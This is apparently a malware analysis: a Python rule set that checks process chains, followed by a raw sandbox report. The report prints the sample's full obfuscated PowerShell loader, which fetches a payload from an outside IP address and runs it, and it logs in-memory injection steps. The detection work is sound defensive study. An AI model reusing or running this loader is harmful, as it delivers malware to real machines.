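    ProcEvent(None, r"C:\Windows\System32\wscript.exe"),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\conhost.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", r"C:\Program Files (x86)\Windows Mail\wab.exe"),
    ProcEvent(r"C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe", r"C:\Windows\SysWOW64\recover.exe"),
    ProcEvent(None, r"C:\Program Files (x86)\Windows Mail\wab.exe"),
    ProcEvent(None, r"C:\Windows\System32\rundll32.exe"),
    ProcEvent(None, r"C:\Program Files (x86)\Windows Mail\wab.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\recover.exe", r"C:\Program Files\Mozilla Firefox\firefox.exe"),
]

if __name__ == "__main__":
    for rule, parent, child in check_chain(REPORTED_EVENTS):
        print(f"{rule}: {parent} -> {child}")
```

Against the pairs from this report the four rules fire exactly once each, on the four hops named in the lead-in; the two wab.exe instances with no recorded parent do not match rule 3 because the parent is unknown, which is worth remembering when porting this to telemetry that does record parents (there, a wab.exe whose parent is another wab.exe is equally unusual).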
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: actxprxy.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\recover.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: ws\System.Core.pdbAP source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: recover.pdb source: wab.exe, 0000000A.00000003.2572034726.0000000004355000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358338282.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2451195111.0000000007138000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2451195111.0000000007138000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3357478857.000000000019E000.00000002.00000001.01000000.00000007.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3357480390.000000000019E000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2494599943.000000001FBC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2489818539.000000001FA12000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2618102098.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2620352047.000000000328B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbR*\ source: powershell.exe, 00000005.00000002.2455567320.00000000081B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2494599943.000000001FBC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2489818539.000000001FA12000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2618102098.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2620352047.000000000328B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: recover.pdbGCTL source: wab.exe, 0000000A.00000003.2572034726.0000000004355000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358338282.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb/ source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdbGCTL source: recover.exe, 0000000D.00000002.3359350898.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2712305757.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3263016249.000000000414C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wab.pdb source: recover.exe, 0000000D.00000002.3359350898.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2712305757.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3263016249.000000000414C000.00000004.80000000.00040000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("PowerShell.exe", ""$Caked124 = 1;$Allegroernes15='S';$All", "", "", "0");
Source: Yara match File source: 00000005.00000002.2459777266.0000000009FC7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2449498441.000000000580F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2456067729.0000000008600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2640024983.000002432CDEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Transpatronized)$global:Decentralised = [System.Text.Encoding]::ASCII.GetString($Unlaid)$global:Museumise=$Decentralised.substring(307583,25216)<#Strygeinstrumentet Anelsers Leisured
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Gallantise $Minimumslaengden $Leewill), (Delyst @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tekststumpernes = [AppDomain]::CurrentDomain.GetAssemblies(
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Transponeredes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Tapinocephalic, $false).DefineType($Enmesh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Transpatronized)$global:Decentralised = [System.Text.Encoding]::ASCII.GetString($Unlaid)$global:Museumise=$Decentralised.substring(307583,25216)<#Strygeinstrumentet Anelsers Leisured
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . 
